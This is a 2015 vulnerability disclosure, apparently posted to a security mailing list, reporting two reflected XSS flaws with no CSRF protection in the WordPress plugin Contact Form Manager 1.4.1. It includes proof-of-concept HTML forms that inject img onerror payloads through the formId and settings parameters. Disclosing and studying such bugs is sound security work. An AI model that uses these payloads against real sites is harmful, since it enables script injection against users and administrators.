Subject: Cross-Site Scripting (XSS) in Contact Form Manager 1.4.1
Date: Mon, 24 Aug 2015 15:27:43 +0200

Hello,

Plugin: Contact Form Manager 1.4.1 https://wordpress.org/plugins/contact-form-manager/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=ajax_load_elements
Vulnerable parameters: formId

Example PHP callstack:
xyz_cfm_ajax_load_elements   [/contact-form-manager/admin/ajax-load-elements.php:34]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=ajax_load_elements" />
<input type="text" name="formId" value='</script><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

2. Reflected Cross-Site Scripting (XSS)

Authenticated administrators can inject html/js code (there is no CSRF protection!).

Method: POST
Url: http://localhost/wp-admin/admin.php?page=contact-form-manager-manage
Vulnerable parameters: xyz_cfm_pagelimit, xyz_cfm_recaptchaPrivateKey, xyz_cfm_recaptchaPublicKey

Example PHP callstack:
/contact-form-manager/admin/setting.php:191

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=contact-form-manager-manage" />
<input type="text" name="xyz_cfm_pagelimit" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--


--
Regards,
Marcin Probola,